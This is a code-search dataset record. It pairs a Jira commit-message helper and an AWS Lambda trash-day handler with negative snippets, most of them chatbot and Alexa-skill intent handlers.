(\"yes, pay my mobile bill\"):\n await self.__show_invoice_card(turn_context)\n await self.__show_selectAccountForBill_card(turn_context)\n elif text in(\"debit from xxxxxxxxx4567\"):\n await turn_context.send_activity(\"An OTP is sent to your registered mobile number xxxxxxxx90.\")\n await turn_context.send_activity(\"Please enter the OTP.\")\n elif text in (\"1234\"):\n await turn_context.send_activity(\"Transaction Successful !! Mobile bill paid for $100 from your account number xxxxxxxxx4567\")\n await turn_context.send_activity(\"As a loyal customer, we are happy to offer you one year free VISA card which comes with $25 movie voucher.\\n\\n Also your balance reward points 514 from card xxxxxxxxxxxx7653 will be added to the new card.\")\n await self.__show_congratulations_card(turn_context)\n elif text in (\"credit card\"):\n await turn_context.send_activity(\"Credit card xxxxxxxxxxxx7653 \\n\\n Current outstanding is $0.00 \\n\\n Card closed on 09/01/2020 \\n\\n Balance reward points are 514\")\n elif text in (\"service requests\"):\n await turn_context.send_activity(\"Currently there are no open service requests.\")\n elif text in (\"xxxxxxxxx4566\"):\n await turn_context.send_activity(\"Your current account xxxxxxxxx4566 is Active, but there are no transactions on it.\")\n elif text in (\"debit from xxxxxxxxx4566\"):\n await turn_context.send_activity(\"Insufficient account balance. Please choose another account\")\n await self.__show_selectAccountForBill_card(turn_context)\n #else:\n #await self.__send_intro_card(turn_context)", "def useSpeech(self):\n # Implements a subprocess to run the Kuri robot simultaneously with the user input loop\n proc_stdin = io.TextIOWrapper(self.proc.stdin, encoding='utf-8', line_buffering=True)\n\n while True:\n prompt = input(\"Type 's' to begin recording! (Type 'q' to quit) \").lower()\n if prompt == 'q':\n proc_stdin.write('q\\n')\n quit()\n if prompt == 's':\n txt = self.sr.getSpeech(\"Recording...\")\n print(\"Finished recording!\")\n if not txt:\n print(\"\\nCould you say that again?\")\n else:\n sentiment = self.sd.getSentiment(txt)\n proc_stdin.write(sentiment + '\\n')\n print(\"Sentiment: \" + sentiment + '\\n')", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n # intents_object = get_custom_intents()\n print (\"************\")\n print (intent_request)\n # fall_back = True\n # final_function = ''\n # for temp_intent in intents_object:\n # if temp_intent == intent_name:\n # fall_back = False\n # final_function = temp_intent[1]\n # break\n # if(fall_back):\n # return custom_handlers.get_fallback_msg()\n # else:\n # return final_function(intent, session)\n \n # Dispatch to your skill's intent handlers\n if intent_name == \"welcome_intent\":\n return custom_handlers.get_welcome_msg(intent, session)\n elif intent_name == \"search_intent\":\n return custom_handlers.get_search_msg(intent, session)\n elif intent_name == \"architecture\":\n return custom_handlers.get_architecture_msg(intent, session)\n elif intent_name == \"saybye\":\n return custom_handlers.get_saybye_response(intent, session)\n elif intent_name == \"myname\":\n return custom_handlers.get_myname_response(intent, session)\n elif intent_name == \"ask\":\n return custom_handlers.get_ask_response(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return custom_handlers.get_welcome_response(intent, session)\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return custom_handlers.handle_session_end_request(intent, session)\n else:\n return custom_handlers.get_fallback_msg(intent, session)", "def respond_from_waiting(self, message, tags):\n self.stance = None\n self.used_arguments = []\n\n # Use tags and message to determine user stance, then define bot's stance as the opposite\n # If user is neutral/has no opinion, the bot will randomly choose between pro and con\n\n if 'veganism' in tags or 'anti_vegan_stance' in tags or 'pro_vegan_stance' in tags: #we might wanna delete this part, as it is unnecessary, the conversation is already about veganism\n for stance in self.STANCES:\n # If user is pro-vegan, bot takes anti-vegan stance\n if 'pro_vegan_stance' in tags:\n self.stance = 'anti_vegan'\n # print(\"is in pro vegan stance\")\n return self.go_to_state('anti_vegan_stance')\n\n # Determine the first argument the bot will use, add to used_arguments\n #\n #return self.go_to_state('anti_vegan_stance')\n\n # If user is anti-vegan, bot takes pro-vegan stance\n elif 'anti_vegan_stance' in tags:\n self.stance = 'pro_vegan'\n # print(\"is in anti vegan stance\")\n return self.go_to_state('pro_vegan_stance')\n\n # If user is neutral, bot chooses randomly between pro and anti vegan stances\n else:\n # Choose stance randomly\n self.stance = random.choice(STANCES)\n\n if self.stance == 'pro_vegan':\n return self.go_to_state('pro_vegan_stance')\n else:\n return self.go_to_state('anti_vegan_stance')\n\n elif 'thanks' in tags:\n return self.finish('thanks')\n else:\n return self.finish('confused')", "async def test_target_dialogue_state_management(self, dm):\n context = create_request(\"domain\", \"intent\")\n result = await dm.apply_handler(\n context, create_responder(context), target_dialogue_state=\"intent_entity_2\"\n )\n assert result.dialogue_state == \"intent_entity_2\"", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n if intent_name == \"GUTSIntent\":\n session_attributes = {}\n return build_response(session_attributes, build_speechlet_response(\n \"GUTSCard\", \"I have the GUTS\", \"I love hackathons\", True))\n\n if intent_name == \"LoveAIntent\":\n #session_attributes = {}\n #if loveStage = 1:\n # return build_response(session_attributes, build_speechlet_response(\n # \"Love1Card\", \"I love Theo!\", \"I love Theo so much!\", False))\n return handle_love_A_intent(session)\n\n if intent_name == \"LoveBIntent\":\n return handle_love_B_intent(session)\n\n if intent_name == \"LoveCIntent\":\n return handle_love_C_intent(session)", "def on_intent(intent_request, session):\r\n\r\n print(\"on_intent requestId=\" + intent_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n\r\n intent = intent_request['intent']\r\n intent_name = intent_request['intent']['name']\r\n \r\n if intent_name == \"unsafe\":\r\n send_message_alerts()\r\n session_attributes = {}\r\n card_title = \"Welcome, this is Emma\"\r\n speech_output = \"Calling police, Connected with police , Police on the way. Police will be in 1 min . Your relatives and frieds are all informed. Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me\"\r\n \r\n # If the user either does not reply to the welcome message or says something\r\n # that is not understood, they will be prompted again with this text.\r\n reprompt_text = \"Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me \"\r\n \r\n should_end_session = False\r\n return build_response(session_attributes, build_speechlet_response(\r\n card_title, speech_output, reprompt_text, should_end_session))\r\n \r\n \r\n \r\n elif intent_name == \"AMAZON.HelpIntent\":\r\n return get_welcome_response()\r\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\r\n return handle_session_end_request()\r\n else:\r\n raise ValueError(\"Invalid intent\")", "def on_intent(event_request, session):\n print(\"=====on_intent requestId: \" + event_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = event_request['intent']\n intent_name = event_request['intent']['name']\n print(\"=====intent is: \" + intent_name)\n\n if intent_name == \"AnswerIntent\":\n print(\"=====AnswerIntent fired...\")\n if 'attributes' in session:\n if 'questions' in session['attributes']:\n return handle_answer_request(intent, session)\n\n # we probably got here because user said something other than\n # yes or no after asking if they wanted to play the game again\n print(\"=====no attributes ending game\")\n return play_end_message()\n if intent_name == \"GameIntent\":\n print(\"=====GameIntent fired...\")\n # if there's a session and we're in a game treat this as an answer\n # unfortunately it will be wrong but it's better than starting over\n if 'attributes' in session:\n if session['attributes']['game_status'] == \"in_progress\":\n return handle_answer_request(intent, session)\n return play_new_game(False)\n if intent_name in (\"AMAZON.StartOverIntent\", \"AMAZON.YesIntent\"):\n print(\"=====StartOverIntent or YesIntent fired...\")\n return play_new_game(True)\n if intent_name == \"AMAZON.NoIntent\":\n print(\"=====NoIntent fired...\")\n # if there's a session and we're in a game treat this as a wrong answer\n if 'attributes' in session:\n if session['attributes']['game_status'] == \"in_progress\":\n return handle_answer_request(intent, session)\n # otherwise end the game\n return play_end_message()\n if intent_name in (\"AMAZON.StopIntent\", \"AMAZON.CancelIntent\"):\n print(\"=====StopIntent or CancelIntent fired\")\n return play_end_message()\n if intent_name == 'AMAZON.HelpIntent':\n print(\"=====HelpIntent...\")\n tts = \"During the game I'll give you 6 random brain teasers and only 8 \"\\\n \"seconds to anser each one... To make your mind muscles stronger, I \"\\\n \"won't repeat any of the questions, so try to remember all the \"\\\n \"details... You can say 'Start Over' if you'd like a new game, \"\\\n \"or make your guess for the last question...\"\n return speech(tts, session['attributes'], False, None)", "def func(self):\n if not self.args:\n self.msg(\n \"{wYou are currently speaking:{n %s\"\n % self.caller.languages.current_language.capitalize()\n )\n self.list_languages()\n return\n if \"translate\" in self.switches:\n obj = self.caller.search(self.args)\n if not obj:\n return\n translation = obj.item_data.translation\n matches = False\n for lang in self.caller.languages.known_languages:\n if lang in translation:\n self.msg(\n \"You translate the following from %s:\\n%s\"\n % (lang.capitalize(), translation[lang])\n )\n matches = True\n if not matches:\n self.msg(\n \"%s does not seem to contain any foreign tongue you can read.\" % obj\n )\n return\n if not self.switches:\n args = self.args.lower()\n if args == \"arvani\" or args == \"common\":\n self.caller.attributes.remove(\"currently_speaking\")\n self.msg(\"{wYou are now speaking Arvani.{n\")\n return\n if args not in self.caller.languages.known_languages:\n self.msg(\"You cannot speak %s.\" % self.args)\n self.list_languages()\n return\n self.caller.db.currently_speaking = args\n self.msg(\"{wYou are now speaking %s.{n\" % self.args)\n return\n player = self.caller.player.search(self.lhs)\n if not player:\n return\n targ = player.char_ob\n if not targ:\n self.msg(\"Not found.\")\n return\n if \"teachme\" in self.switches:\n if self.caller.languages.additional_languages <= 0:\n self.msg(\n \"You need a higher rank of linguistics before you can learn anything else.\"\n )\n return\n req = targ.ndb.language_requests or {}\n req[self.caller] = self.rhs\n targ.ndb.language_requests = req\n self.msg(\"You request that %s teach you %s.\" % (targ, self.rhs))\n targ.msg(\n \"{w%s has requested that you teach them %s.{n\" % (self.caller, self.rhs)\n )\n return\n if \"teach\" in self.switches:\n req = self.caller.ndb.language_requests or {}\n if targ not in req:\n self.msg(\"You do not have a request from %s.\" % targ)\n return\n lang = req[targ].lower()\n if lang not in self.caller.languages.known_languages:\n self.msg(\"You do not know %s.\" % lang)\n self.list_languages()\n return\n if targ.languages.max_languages <= len(targ.languages.known_languages):\n self.msg(\"They know as many languages as they can learn.\")\n return\n targ.languages.add_language(lang)\n self.msg(\"You have taught %s to %s.\" % (lang, targ))\n targ.msg(\"%s has taught you %s.\" % (self.caller, lang))\n return", "def handle_kitten(self):\n\n # Get a list of talks.\n talks = Proposal.objects.talks()\n counter = 0\n\n # Iterate over talks until we either run out of talks,\n # or have hit the number we are supposed to be reviewing.\n for talk in talks:\n # Sanity check: Does this talk belong?\n if self.args.start and talk.id < self.args.start:\n continue\n\n # If this talk is decided, don't include it.\n if talk.status != 'undecided':\n continue\n\n # If this is the first talk, print out an agenda header; if it's\n # the first talk of overflow, print out an overflow header.\n if counter == 0:\n print '=== AGENDA ===\\n'\n if counter == self.args.num and self.args.overflow > 0:\n print '=== OVERFLOW ===\\n'\n\n # Okay, now print out the talk information.\n print talk.agenda_format\n\n # Increment the counter, so we know how far to go.\n # If we've printed out enough talks, stop.\n counter += 1\n if counter == self.args.num + self.args.overflow:\n return", "def handle_action_dict(self, speaker: str, d: Dict, chatstr: str) -> Optional[DialogueObject]:\n coref_resolve(self.agent.memory, d, chatstr)\n logging.info('ttad post-coref \"{}\" -> {}'.format(hash_user(speaker), d))\n\n if d[\"dialogue_type\"] == \"NOOP\":\n return Say(\"I don't know how to answer that.\", **self.dialogue_object_parameters)\n elif d[\"dialogue_type\"] == \"HUMAN_GIVE_COMMAND\":\n return Interpreter(speaker, d, **self.dialogue_object_parameters)\n elif d[\"dialogue_type\"] == \"PUT_MEMORY\":\n return PutMemoryHandler(speaker, d, **self.dialogue_object_parameters)\n elif d[\"dialogue_type\"] == \"GET_MEMORY\":\n logging.info(\"this model out: %r\" % (d))\n logging.info(\"querying previous model now\")\n if self.ttad_prev_model:\n prev_model_d = self.ttad(s=chatstr, model=self.ttad_prev_model, chat_as_list=True)\n logging.info(\"prev model out: %r\" % (prev_model_d))\n if (\n prev_model_d[\"dialogue_type\"] != \"GET_MEMORY\"\n ): # this happens sometimes when new model sayas its an Answer action but previous says noop\n return Say(\n \"I don't know how to answer that.\", **self.dialogue_object_parameters\n )\n return GetMemoryHandler(speaker, prev_model_d, **self.dialogue_object_parameters)\n else:\n return GetMemoryHandler(speaker, d, **self.dialogue_object_parameters)\n else:\n raise ValueError(\"Bad dialogue_type={}\".format(d[\"dialogue_type\"]))" ]
[ "0.607286", "0.60394377", "0.59018356", "0.5812541", "0.5732079", "0.5696963", "0.56619567", "0.56086385", "0.5504005", "0.54966825", "0.54938865", "0.5492362", "0.5490855", "0.54654175", "0.5454416", "0.5349049", "0.5348369", "0.53459346", "0.5345559", "0.53378665", "0.5323232", "0.5315376", "0.53119636", "0.5302778", "0.5295307", "0.52725327", "0.5267203", "0.52649814", "0.52209496", "0.5210147" ]
0.66725177
0
Creates a git commit message template for cases currently assigned to you.
def do_jira_case_commit_message(self, arg): cases = [(issue.key, issue.fields.summary, self.jira_url() + "/browse/" + issue.key) for issue in self.get_open_issues()] msg = """ -------------------------------------------------------------------- [{}] {} <msg> {} -------------------------------------------------------------------- """ for case in cases: print(msg.format(case[0], case[1], case[2]))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _generate_commit(\n self, msg: Optional[str] = None, author: Optional[str] = None\n ) -> dict:\n if author:\n mes_author = author\n else:\n mes_author = self._author\n if not msg:\n msg = f\"Commit via python client {__version__}\"\n ci = {\"commit_info\": {\"author\": mes_author, \"message\": msg}}\n return ci", "def create_template(self):\n options = {\n 'dir': os.path.join(os.path.dirname(__file__)),\n 'template': self.template,\n 'project': self.project,\n 'answers_file': self.answers_file,\n }\n return self.env.run(\n '%(dir)s/bin/mrbob -O %(project)s --config '\n '%(dir)s/%(answers_file)s %(dir)s/bobtemplates/%(template)s'\n % options)", "def _get_mail_template(request, issue, full_diff=False):\n context = {}\n template = 'mails/comment.txt'\n if request.user == issue.owner:\n query = models.Message.query(\n models.Message.sender == request.user.email(), ancestor=issue.key)\n if query.count(1) == 0:\n template = 'mails/review.txt'\n files, patch = _get_affected_files(issue, full_diff)\n context.update({'files': files, 'patch': patch, 'base': issue.base})\n return template, context", "async def _cmdf_chtemplate(self, substr, msg, privilege_level):\n if len(substr) == 0:\n await self._client.send_msg(msg, \"Error: No content.\")\n return\n elif len(substr) > 1800: # This value is arbitrary.\n await self._client.send_msg(msg, \"Error: Message is too long.\")\n return\n\n self._ch_msg_template = substr\n self._save_settings()\n\n await self._client.send_msg(msg, \"Successfully set the new in-channel greeting template. Please double-check.\")\n return", "def create_actions_template(name):\n template = Template(ACTIONS_TEMPLATE)\n msg = template.render(name=name)\n return msg", "def __generateDefaultCommitMessage(self):\n if self.commitGroupBox.isChecked():\n if self.idButton.isChecked():\n msg = \"Merged commit {0} into {1}.\".format(\n self.idEdit.text(), self.__currentBranch)\n elif self.tagButton.isChecked():\n msg = \"Merged tag {0} into {1}.\".format(\n self.tagCombo.currentText(), self.__currentBranch)\n elif self.branchButton.isChecked():\n msg = \"Merged branch {0} into {1}.\".format(\n self.branchCombo.currentText(), self.__currentBranch)\n elif self.remoteBranchButton.isChecked():\n msg = \"Merged remote branch {0} into {1}.\".format(\n self.remoteBranchCombo.currentText(), self.__currentBranch)\n else:\n msg = \"Merged into {0}.\".format(self.__currentBranch)\n self.commitMessageEdit.setPlainText(msg)\n else:\n self.commitMessageEdit.clear()", "def _generate_markdown(self, case):\n # Lucene query generation\n lucene_dict = {\n \"sources\": case[\"detection\"][\"sources\"],\n \"data\": case[\"input_arguments\"],\n }\n case[\"lucene_query\"] = self.templates[\"lucene\"].render(lucene_dict)\n # AWS CLI command generation\n command_template = jinja2.Template(case[\"executors\"][\"sh\"][\"code\"])\n if case[\"input_arguments\"]:\n aws_cli_render_args = {}\n for arg in case[\"input_arguments\"]:\n aws_cli_render_args[arg] = case[\"input_arguments\"][arg][\"value\"]\n case[\"compiled_command\"] = command_template.render(aws_cli_render_args)\n else:\n case[\"compiled_command\"] = command_template.render()\n\n render_dict = {\"case\": case}\n return self.templates[\"markdown\"].render(render_dict)", "def issue_create():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-a\", \"--assignees\", default=[], nargs=\"*\", help=\"users to assign to this issue\"\n )\n parser.add_argument(\"-b\", \"--body\", default=None, help=\"text body of the issue\")\n parser.add_argument(\n \"-c\",\n \"--column\",\n default=DEFAULT_COLUMN_NAME,\n help=\"name of column to place card in\",\n )\n parser.add_argument(\n \"-i\",\n \"--interactive\",\n action=\"store_true\",\n default=DEFAULT_COLUMN_NAME,\n help=\"Edit issue title and body in vim\",\n )\n parser.add_argument(\n \"-l\", \"--labels\", default=None, nargs=\"*\", help=\"labels to add to the new issue\"\n )\n parser.add_argument(\n \"-m\",\n \"--milestone\",\n default=None,\n help=\"milestone id to place this issue in. \"\n \"This should be an integer. \"\n \"Find milestone ids with the `milestones` command.\",\n )\n parser.add_argument(\n \"-p\", \"--project\", default=SCRUM_BOARD_NAME, help=\"project to create issue in\"\n )\n parser.add_argument(\"title\", default=None, nargs=\"?\", help=\"issue title\")\n\n args = parser.parse_args()\n\n # only required arg for creating an issue. can be overridden in interactive mode\n title = args.title\n\n # this can be overridden in interactive mode\n body = args.body\n\n if args.interactive:\n with tempfile.NamedTemporaryFile(\"w\") as fh:\n path = fh.name\n\n editor = os.environ.get(\"EDITOR\", os.environ.get(\"VISUAL\", \"vi\"))\n\n proc = getattr(sh, editor)\n\n proc(path, _fg=True)\n\n with open(path, \"r\") as rfh:\n\n # grab top line as title\n title = rfh.readline().replace(\"\\n\", \"\")\n\n # grab remaining lines as body\n body = \"\".join(rfh.readlines())\n\n session = GithubSession()\n\n additional_args = {\n \"assignees\": args.assignees,\n \"body\": body,\n \"labels\": args.labels,\n \"milestone\": args.milestone,\n }\n\n issue = session.create_issue(title, **additional_args)\n\n column_name = args.column\n project_name = args.project\n\n project = session.get_project(project_name)\n column = session.get_column(project, column_name)\n\n # finally, create the card\n session.create_card(column, issue)\n\n print(json.dumps(issue, indent=2))", "def read_template():\n\n text_msg = \"\"\"${PERSON_NAME} - Calling Campaign Summary - ${DATE}:\\n\n Total Called = ${TOTAL_CALLED}\\n\n Answered = ${ANSWERED}\\n\n Not Answered = ${NOT_ANSWERED}\\n\n Declines = ${DECLINES}\\n\n Remaining = ${REMAINING}\\n\n \\n\n Thank You.\"\"\"\n\n return Template(text_msg)", "def format_template(commit_info, nb):\n\n nb_path = os.path.abspath(nb).replace('ipynb', 'md')\n with open(nb_path, 'r+') as file:\n template = NbTemplate(file.read())\n updated = template.substitute(commit_info)\n file.seek(0)\n file.write(updated)\n file.truncate()", "def create(ctx):\n pass", "def _create_tag_message(commits: List[git.objects.commit.Commit],\n tag: semantic_version.Version) -> str:\n\n tag_message = 'Release {} \\n\\n'.format(str(tag))\n\n for message in [c.message for c in commits]:\n tag_message += ' * {}\\n'.format(message.split('\\n')[0].strip())\n return tag_message", "def make_git_config(self):\n if self.kind == 'personal':\n context = dict(\n name='Rob deCarvalho',\n email='[email protected]',\n github_user_spec=textwrap.dedent(\n \"\"\"\n [github]\n user = robdmc\n \"\"\"\n )\n )\n elif self.kind == 'generic':\n context = dict(\n name='Generic User',\n email='[email protected]',\n github_user_spec='',\n )\n\n else:\n raise ValueError('\"kind\" must be in [\"personal\", \"generic\"]')\n\n with open(os.path.join(FILE_PATH, 'gitconfig_template')) as f:\n template = f.read()\n contents = template.format(**context)\n\n if self.dry_run:\n print('=' * 40 + ' .git_config ' + '=' * 40)\n print(contents)\n print('=' * 40 + ' end .git_config ' + '=' * 40)\n else:\n with open(os.path.expanduser('~/.gitconfig'), 'w') as out:\n out.write(contents)", "async def create_ticket(self, member : Member, guild : Guild):\n licence_id = await servers.get_licence_id(guild.id)\n category : CategoryChannel = guild.get_channel(await self.categorys.get_category_id(licence_id))\n role = guild.get_role(await self.roles.get_role_id(licence_id))\n \n\n channel : TextChannel = await category.create_text_channel(f'ticket-{member.name}')\n\n overwrite_everyone = PermissionOverwrite()\n overwrite_everyone.send_messages = False\n overwrite_everyone.read_messages = False\n\n overwrite_member = PermissionOverwrite()\n overwrite_member.send_messages = True\n overwrite_member.read_messages = True\n\n\n everyone_role = guild.default_role\n\n await channel.set_permissions(target=everyone_role,overwrite=overwrite_everyone)\n await channel.set_permissions(target=member, overwrite=overwrite_everyone)\n await channel.set_permissions(target=role, overwrite=overwrite_member)\n await channel.send(content = member.mention + \" \" + role.mention)", "def message_of(cfg, ticket, phase):\n return cfg[\"message_template\"] % (ticket, text(cfg, phase))", "def create_letter(cls, donor_status, donor_name, donation_amt):\n if donor_status == 0:\n letter_text = '''\n Dear {0},\n\n Thank you for your very kind donation of ${1:.2f}, and for your continuing support.\n\n Your generous contribution will be put to very good use.\n\n Sincerely,\n -The Team\n '''.format(donor_name, donation_amt)\n return letter_text\n elif donor_status == 1:\n letter_text = '''\n Dear {0},\n\n Thank you for your very kind donation of ${1:.2f}.\n\n Your generous contribution will be put to very good use.\n\n Sincerely,\n -The Team\n '''.format(donor_name, donation_amt)\n return letter_text\n elif donor_status == 2:\n return ('''\n Dear {0},\n\n Thank you for your very kind contribution(s) totaling ${1:.2f}.\n\n We would like you to know that your generous donation(s) will be put to very good use.\n\n Sincerely,\n -The Team\n '''.format(donor_name, donation_amt))", "def _create_pre_commit(destination, template, context):\n # Is there already a hook?\n if isfile(destination) and not _pre_commit_has_hallmark(destination):\n raise PreCommitExists('{0} already exists'.format(destination))\n\n with open(destination, 'w') as fh:\n fh.write(template.format(**context))\n\n sinfo = stat(destination)\n mode = sinfo.st_mode | S_IXUSR | S_IXGRP | S_IXOTH\n\n # Make sure it's executable\n chmod(destination, mode)\n\n return destination", "def make_commit(self, commit_message, branch_name) -> Commit:\n self.load_config()\n commit = Commit(commit_message)\n commit.branch_name = branch_name\n commit.init_config()\n branch = Branch.make_branch_from_config(branch_name)\n prev_commit = branch.get_current_commit()\n if prev_commit is not None:\n commit_number = prev_commit.commit_number\n commit.set_previous_commit_number(commit_number)\n commit.freeze_files(self.__indexed_files, self.__directory)\n self.__last_commit = commit\n self.config['info']['files'] = ''\n self.config['info']['last_commit'] = commit.commit_number\n self.config['info']['last_commit_branch'] = commit.branch_name\n self.save_config()\n return commit", "def create_test_audit_template(context, **kw):\n audit_template = get_test_audit_template(context, **kw)\n audit_template.create()\n return audit_template", "def build_commit_msg(author, reviewers, source_branch, target_branch,\n commit_message, mp_web_link):\n return \"Merge {} into {} [a={}] [r={}]\\n\\n{}\\n\\nMP: {}\".format(\n source_branch, target_branch, author,\n reviewers, commit_message, mp_web_link)", "def createchore():\n return render_template(\"newchore.html\")", "def create_crud_template(name):\n template = Template(CRUD_TEMPLATE)\n msg = template.render(name=name)\n return msg", "def new_assignment(self, fname, lname, codename,\n assignment, duedate, duetime):\n return self._env.get_template('new_assignment.txt').render(\n fname=fname,\n lname=lname,\n codename=codename,\n assignment=assignment,\n duedate=duedate,\n duetime=duetime\n )", "def cmd_conversation_create(client, args):\n create_message = client.create_message(args.recipient, args.body)\n generate_output({'create_message': create_message})", "def generate(problem, prompt_default=True):\n\n msg = \"Generate file for problem %i?\" % problem\n click.confirm(msg, default=prompt_default, abort=True)\n problemText = get_problem(problem)\n\n filename = get_filename(problem)\n\n if os.path.isfile(filename):\n msg = '\"{0}\" already exists. Overwrite?'.format(filename)\n click.confirm(click.style(msg, fg='red'), abort=True)\n\n problemHeader = 'Project Euler Problem %i\\n' % problem\n problemHeader += '=' * len(problemHeader.strip()) + '\\n\\n'\n\n with open(filename, 'w') as file:\n file.write('\"\"\"\\n')\n file.write(problemHeader)\n file.write(problemText)\n file.write('\"\"\"\\n\\n\\n')\n\n click.secho('Successfully created \"{0}\".'.format(filename), fg='green')", "def create_html(text, template, output):\n\n # TODO uncomment this for orginal DMP format (right now difficult with differing section sizes)\n #templateLoader = jinja2.FileSystemLoader(searchpath=\"../templates/new\")\n templateLoader = jinja2.FileSystemLoader(searchpath=\"../templates\")\n templateEnv = jinja2.Environment(loader=templateLoader)\n TEMPLATE_FILE = \"template_\" + template.lower() + \".html\"\n real_template = templateEnv.get_template(TEMPLATE_FILE)\n\n outputText = real_template.render(contact=text)\n html_file = open(output + \".html\", \"w\")\n html_file.write(outputText)\n html_file.close()\n\n return output + \".html\"", "def generate(self):\n\n letter = ''\n\n for template_name in self.templates:\n template = self.templates[template_name]\n\n # Process all replacements ({...} syntax).\n replacements = re.finditer(REPLACEMENT_REGEX, template)\n for replacement in replacements:\n match = replacement.group()\n key = replacement.group(1)\n\n template = template.replace(match, self._lookup(key))\n\n # Process all conditionals (<...> syntax).\n conditionals = re.finditer(CONDITIONAL_REGEX, template)\n for conditional in conditionals:\n match = conditional.group()\n\n # Process each condition within the conditional ([...]... syntax).\n conditions = re.finditer(CONDITION_REGEX, match)\n for index, condition in enumerate(conditions):\n skill_type = condition.group(2)\n skill = condition.group(3)\n text = condition.group(4)\n\n # If the skill is empty, treat it as a catch all case.\n if not skill or skill in self._lookup(skill_type):\n template = template.replace(match, text)\n break\n\n letter += template\n\n return letter", "def new_create_log_message(incident_name: str, **kwargs) -> str:\r\n incident_type, incident_code = incident_name.split()\r\n url_name_list = kwargs[\"url_name_list\"] if \"url_name_list\" in kwargs else None\r\n url_name = kwargs[\"url_name\"].lower() if \"url_name\" in kwargs else None\r\n url_path = kwargs[\"url_path\"].lower() if \"url_path\" in kwargs else None\r\n\r\n incidents = {\r\n \"Info\": [\r\n \"JSON was decode\",\r\n f\"Package was download from URL: { url_path }\"\r\n ],\r\n \"Warning\": [\r\n \"JSON is not valid\",\r\n f\"JSON did not loaded from URL: { url_path }\"\r\n ],\r\n \"Error\": [\r\n f\"No version was found in { url_name_list }\",\r\n f\"Package download error from URL: { url_path }\"\r\n ],\r\n \"Disaster\": [\r\n \"No one package was downloaded\"\r\n ]\r\n }\r\n yield f\"{ datetime.now() } -- { incident_type } \\t { url_name }:\\t { incidents[incident_type][int(incident_code)] }\"", "async def create(self, ctx, name: str,\n owner: discord.Member = None) -> discord.Message:\n if ctx.projects.find_project(name):\n project = ctx.projects.find_project(name)\n if ctx.guild.get_Channel(int(project.get(\"channel\"))):\n return await ctx.send(\"A project with that name exists.\")\n else:\n await ctx.send(\"A project with this name exists but, a related\"\n \" project channel was not found. \"\n \"I will be overwriting the previous project.\")\n ctx.projects.delete_project(name)\n\n owner = owner if owner else ctx.author\n if not ctx.bot.db(\"guilds\").find(str(ctx.guild.id)):\n ctx.bot.db(\"guilds\").insert(str(ctx.guild.id), ctx.bot.empty_guild)\n\n # await ctx.send(\"Creating project channel...\")\n if not ctx.bot.db(\"guilds\").find(\n str(ctx.guild.id)).get(\"project_category\"):\n overwrites = {\n ctx.guild.default_role: discord.PermissionOverwrite(\n read_messages=False\n ),\n ctx.me: discord.PermissionOverwrite(\n read_messages=True,\n send_messages=True,\n manage_channels=True\n )\n }\n category = await ctx.guild.create_category(\"Flux Projects\",\n overwrites=overwrites)\n ctx.bot.db(\"guilds\").update(str(ctx.guild.id), {\n \"project_category\": str(category.id)})\n\n else:\n category = ctx.guild.get_channel(\n int(ctx.bot.db(\"guilds\").find(\n str(ctx.guild.id)).get(\"project_category\")))\n\n overwrites = {owner: discord.PermissionOverwrite(read_messages=True,\n send_messages=False,\n add_reactions=True),\n ctx.me: discord.PermissionOverwrite(read_messages=True,\n send_messages=True),\n ctx.guild.default_role: discord.PermissionOverwrite(\n read_messages=False)}\n\n channel = await ctx.guild.create_text_channel(f\"{name}-project\",\n category=category,\n overwrites=overwrites)\n await channel.send(f\"Project Owner: {owner}\")\n message = await channel.send(self.empty_progress_bar)\n await message.pin()\n res = ctx.projects.create_project(\n owner.id, owner.id, name, channel.id, message.id)\n if not res:\n return await ctx.send(\"An error has occurred. Use `.contact`\"\n \" with error: `ERR_PROJECT_STILL_EXISTS`\")\n return await ctx.send(\"Project created!\")", "def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)" ]
[ "0.58265114", "0.56810087", "0.56475306", "0.54282033", "0.53819776", "0.5301259", "0.52773494", "0.5231186", "0.5216202", "0.5213242", "0.5183639", "0.517318", "0.5149136", "0.5134215", "0.512786", "0.5119132", "0.5117917", "0.50955975", "0.50477743", "0.5016975", "0.50106007", "0.4991806", "0.49911693", "0.49719685", "0.49669358", "0.49572024", "0.49344993", "0.49300116", "0.49111474", "0.48781097" ]
0.5991317
0
lambda function handler for getting trash day
def lambda_handler(event, context) -> dict: logging.info('Starting function with context=%s and event=%s', context, event) date = event['date'] holiday_schedule = trash_schedule_service.get_schedule() trash_day = trash.next_trash_day(date, holiday_schedule) logging.info('Completed function with response=%s', trash_day) return trash_day
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
